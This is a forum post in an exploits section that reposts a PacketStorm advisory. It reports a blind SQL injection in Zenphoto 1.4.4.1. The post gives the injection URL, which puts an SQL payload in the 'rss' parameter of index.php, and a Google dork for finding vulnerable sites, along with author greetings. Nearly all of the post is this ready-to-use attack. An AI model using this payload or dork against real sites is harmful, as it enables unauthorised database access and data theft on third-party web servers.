Jump to content
Praetorian503

Zenphoto 1.4.4.1 Blind SQL Injection

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

Zenphoto version 1.4.4.1 suffers from a remote blind SQL injection vulnerability.

######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org                                            #
#                                                                                    #
# Security Risk : High                                                               #
#                                                                                    #
# Version       : 1.4.4.1                                                            #
#                                                                                    #
# Tested on     : Linux - Windows                                                    #
#                                                                                    #
# Google Dork   : "Powered by Zenphoto"                                              #
#                                                                                    #
######################################################################################
#                                                                                    #
#  Exploit :                                                                         #
#                                                                                    #
#  [Target]/index.php?rss=undefined+and+1%3D0?=en[Blind SQL Injection]           #
#                                                                                    #
######################################################################################
#                                                                                    #
# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N     #
#                                                                                    #
#           Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr   #
#                                                                                    #
#           Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir        #
#                                                                                    #
######################################################################################

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...